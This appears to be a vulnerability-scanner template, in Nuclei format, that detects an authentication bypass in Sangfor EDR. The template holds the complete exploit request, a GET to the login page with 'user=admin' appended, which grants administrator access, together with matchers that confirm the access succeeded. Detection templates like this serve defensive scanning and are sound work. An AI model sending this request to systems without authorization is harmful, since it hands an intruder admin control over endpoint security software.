id: sangfor-edr-auth-bypass info: name: Sangfor EDR Authentication Bypass author: princechaddha severity: high description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. tags: sangfor,auth-bypass,login requests: - method: GET path: - "{{BaseURL}}/ui/login.php?user=admin" matchers-condition: and matchers: - type: status status: - 302 - type: word words: - "/download/edr_installer_" part: body - type: word words: - 'Set-Cookie=""' part: header negative: true - type: word words: - 'Set-Cookie=' part: header